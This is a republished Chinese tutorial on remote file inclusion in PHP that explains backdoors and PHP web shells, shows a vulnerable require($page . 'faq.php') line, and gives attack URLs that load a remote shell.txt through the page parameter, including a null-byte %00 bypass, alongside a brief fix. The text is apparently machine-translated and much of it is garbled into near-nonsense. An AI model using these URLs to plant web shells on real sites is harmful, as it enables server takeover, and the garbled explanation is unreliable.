关于远程文件包含 RFI 的解析 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

    远程文件包含在你包括远程文件.. 通常包含该文件将用于恶意目的

    后门

    什么是后门

    以及你的房子有前门... ,通常应该是欢迎

    后门不受欢迎,因为人们通常拿來做壞事

    计算机后门是代码/脚本运行在一个系统与隐身

    它可以让 秘密接触受影响的系统如果安装正确

    后门通常运行作为一个隐藏的进程,并且将开放多个PORT,并接受 命令,利用它

    SHELL

    什么是壳SHELL

    有许多形式的SHELL..我们不会谈论今天虽然SHELL

    一个shell的系统是一个会议/终端,考虑命令等,

关于远程文件包含 RFI 的解析

。像个迷你指挥中心

    SHELL可以在PHP , Java的, C和其他各种语言

    今天,我将解释一个PHP SHELL

    SHELL是一个PHP脚本在PHP旨在考虑用户输入的指令和浏览文件,执行命令,编辑文件,上传文件,如文件管理

    一个PHP Shell是执行通过您的网页浏览器

    eg...www.sites.com / shell.php ?

    PHP的SHELL给你同样的机会,如果你在该机器上的是同一个帐户上执行..

    远程文件包含通常发生当有人使PHP脚本和doesn't代码,以便使脚本sanitizes用户输入和没有任何限制服务器上运行的网站主办的脆弱页

    一个脆弱的网页的源代码可能有這個

   

    require($page . "faq.php");

    ?>

    这就意味着,

    “page” ,不包括引号是变量

    所以您需要键入

    site.com/index.php?page=http://site.com/shell.txt?

    注意:它必须是.txt,

电脑资料

关于远程文件包含 RFI 的解析》(https://www.unjs.com)。文本在延长服务器否则它将运行在其他服务器上的远程文件位于

    还多态性惯于工作如果网址打开或网址包括被禁用或如果网页补丁

    为了修补理论在PHP脚本应该取代

    require($page . "faq.php");

    带有

    require("faq.php");

    然后脚本不能采取通过用户输入的URL

    也有mod_security尝试启用编码外壳链接基地64或十六进制代码

    和脚本,不完全清洁的用户输入,但检查在一定程度上

    使用nullbyte帽子戏法结束时的URL

    例如:

    site.com/index.php?page=http://site.com/shell.txt?%00

    所以,如果你要攻擊

    127.0.0.1index.php?page=document.pdf

    and changed the document.pdf to your shell link

    127.0.0.1index.php?page=http://shell.com/shell.txt?

最新文章